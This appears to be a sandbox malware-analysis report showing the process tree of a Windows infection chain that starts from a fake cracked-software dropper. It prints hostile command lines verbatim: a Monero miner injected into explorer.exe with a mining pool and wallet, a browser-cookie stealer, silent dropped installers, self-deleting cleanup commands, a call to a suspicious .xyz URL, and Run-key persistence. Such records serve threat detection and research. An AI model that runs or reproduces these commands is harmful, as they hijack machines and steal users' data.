                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-UJN1A.tmp\prolab.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-UJN1A.tmp\prolab.tmp" /SL5="$A007A,575243,216576,C:\Program Files\Reference Assemblies\KLLBXLUMYI\prolab.exe" /VERYSILENT
                                                                                            15⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:4764
                                                                                        • C:\Users\Admin\AppData\Local\Temp\f8-0336a-3bc-3e4be-e1ca390e1fe29\Tosubishype.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\f8-0336a-3bc-3e4be-e1ca390e1fe29\Tosubishype.exe"
                                                                                          14⤵
                                                                                          • Checks computer location settings
                                                                                          PID:4364
                                                                                        • C:\Users\Admin\AppData\Local\Temp\9b-125aa-648-52b9f-88376f08c7354\Ciwyrodoto.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\9b-125aa-648-52b9f-88376f08c7354\Ciwyrodoto.exe"
                                                                                          14⤵
                                                                                            PID:6316
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aehbiuk2.tmf\gaooo.exe & exit
                                                                                              15⤵
                                                                                                PID:6240
                                                                                                • C:\Users\Admin\AppData\Local\Temp\aehbiuk2.tmf\gaooo.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\aehbiuk2.tmf\gaooo.exe
                                                                                                  16⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5596
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    17⤵
                                                                                                      PID:212
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      17⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5300
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\53yqbeh5.nca\google-game.exe & exit
                                                                                                  15⤵
                                                                                                    PID:4832
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\53yqbeh5.nca\google-game.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\53yqbeh5.nca\google-game.exe
                                                                                                      16⤵
                                                                                                        PID:5644
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                          17⤵
                                                                                                            PID:2416
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y0fbgo0g.ctn\BarSetpFile.exe /silent & exit
                                                                                                        15⤵
                                                                                                          PID:2540
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\y0fbgo0g.ctn\BarSetpFile.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\y0fbgo0g.ctn\BarSetpFile.exe /silent
                                                                                                            16⤵
                                                                                                              PID:4428
                                                                                                              • C:\ProgramData\8705294.exe
                                                                                                                "C:\ProgramData\8705294.exe"
                                                                                                                17⤵
                                                                                                                  PID:3444
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\040hq1jf.q0o\askinstall31.exe & exit
                                                                                                              15⤵
                                                                                                                PID:6512
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\040hq1jf.q0o\askinstall31.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\040hq1jf.q0o\askinstall31.exe
                                                                                                                  16⤵
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:4716
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                    17⤵
                                                                                                                      PID:5560
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                        18⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:6100
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhfwbqpj.tbr\toolspab1.exe & exit
                                                                                                                  15⤵
                                                                                                                    PID:4488
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mhfwbqpj.tbr\toolspab1.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\mhfwbqpj.tbr\toolspab1.exe
                                                                                                                      16⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:6192
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\mhfwbqpj.tbr\toolspab1.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\mhfwbqpj.tbr\toolspab1.exe
                                                                                                                        17⤵
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:5992
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wuw1olee.4hy\GcleanerWW.exe /mixone & exit
                                                                                                                    15⤵
                                                                                                                      PID:1020
                                                                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                                                              11⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5428
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                                                12⤵
                                                                                                                  PID:6412
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                    13⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5816
                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                                                                11⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4068
                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                                                                11⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4324
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  12⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:6396
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  12⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:6336
                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\vlcplayer.exe
                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\vlcplayer.exe"
                                                                                                                11⤵
                                                                                                                • Drops file in Drivers directory
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Drops file in System32 directory
                                                                                                                • Drops file in Windows directory
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:6096
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                  12⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6608
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=7 --unam-idle-cpu=70 --tls --unam-stealth
                                                                                                                    13⤵
                                                                                                                      PID:6748
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ll0qusur4tu\njha2daajiv.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ll0qusur4tu\njha2daajiv.exe" /ustwo INSTALL
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:3628
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "njha2daajiv.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ll0qusur4tu\njha2daajiv.exe" & exit
                                                                                                              9⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:2144
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im "njha2daajiv.exe" /f
                                                                                                                10⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5448
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\qcrmgz3ea2y\yc3tsckjiaz.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\qcrmgz3ea2y\yc3tsckjiaz.exe"
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4676
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\qcrmgz3ea2y\yc3tsckjiaz.exe"
                                                                                                              9⤵
                                                                                                                PID:5904
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                  10⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:5992
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\n24ua4jxpkc\app.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\n24ua4jxpkc\app.exe" /8-23
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5228
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\n24ua4jxpkc\app.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\n24ua4jxpkc\app.exe" /8-23
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:5020
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\02r0glu0fpa\IBInstaller_97039.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\02r0glu0fpa\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5296
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-GC0H0.tmp\IBInstaller_97039.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-GC0H0.tmp\IBInstaller_97039.tmp" /SL5="$20342,10084460,721408,C:\Users\Admin\AppData\Local\Temp\02r0glu0fpa\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5460
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                  10⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  PID:5732
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-AGU2S.tmp\{app}\vdi_compiler.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-AGU2S.tmp\{app}\vdi_compiler"
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5768
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-AGU2S.tmp\{app}\vdi_compiler.exe"
                                                                                                                    11⤵
                                                                                                                      PID:6460
                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                        ping localhost -n 4
                                                                                                                        12⤵
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:6564
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xpsjw5yljet\vpn.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\xpsjw5yljet\vpn.exe" /silent /subid=482
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5412
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-MFPV7.tmp\vpn.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-MFPV7.tmp\vpn.tmp" /SL5="$2034E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xpsjw5yljet\vpn.exe" /silent /subid=482
                                                                                                                  9⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Modifies system certificate store
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5552
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                    10⤵
                                                                                                                      PID:200
                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                        tapinstall.exe remove tap0901
                                                                                                                        11⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:5200
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                      10⤵
                                                                                                                        PID:4120
                                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                                                                          11⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Modifies system certificate store
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2684
                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                        10⤵
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:6380
                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                        10⤵
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:6724
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\q0ymxmvosz5\jlncbtv2c4m.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\q0ymxmvosz5\jlncbtv2c4m.exe" /quiet SILENT=1 AF=756
                                                                                                                    8⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Enumerates connected drives
                                                                                                                    • Modifies system certificate store
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:5468
                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q0ymxmvosz5\jlncbtv2c4m.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q0ymxmvosz5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617862674 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                      9⤵
                                                                                                                        PID:5844
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IGO7WHJ74G\setups.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\IGO7WHJ74G\setups.exe" ll
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3448
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-3J6MM.tmp\setups.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-3J6MM.tmp\setups.tmp" /SL5="$401C4,2051888,270336,C:\Users\Admin\AppData\Local\Temp\IGO7WHJ74G\setups.exe" ll
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks computer location settings
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:1420
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3648
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                5⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2244
                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                  6⤵
                                                                                                                    PID:4196
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies system certificate store
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4132
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                  5⤵
                                                                                                                    PID:5048
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                      6⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:1356
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5080
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                    5⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:4196
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping 127.0.0.1
                                                                                                                      6⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:4988
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:3780
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                  4⤵
                                                                                                                    PID:5644
                                                                                                                    • C:\ProgramData\8374482.exe
                                                                                                                      "C:\ProgramData\8374482.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4188
                                                                                                                    • C:\ProgramData\4833408.exe
                                                                                                                      "C:\ProgramData\4833408.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:5288
                                                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                        "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4728
                                                                                                                    • C:\ProgramData\8501945.exe
                                                                                                                      "C:\ProgramData\8501945.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:5796
                                                                                                                      • C:\ProgramData\8501945.exe
                                                                                                                        "{path}"
                                                                                                                        6⤵
                                                                                                                          PID:6936
                                                                                                                      • C:\ProgramData\4176459.exe
                                                                                                                        "C:\ProgramData\4176459.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5860
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:5304
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5576
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4256
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                1⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1240
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:4296
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                1⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Modifies Internet Explorer settings
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5004
                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:2144
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:4756
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4896
                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                  1⤵
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5764
                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding A0D689D3923D305B11EAB97EBE206A29 C
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5356
                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 374BDD8716369E423FEA22162C1196CB
                                                                                                                    2⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5156
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                    2⤵
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:7352
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                      3⤵
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:5652
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                        4⤵
                                                                                                                          PID:7380
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXED59C.bat" "
                                                                                                                        3⤵
                                                                                                                          PID:7204
                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                            4⤵
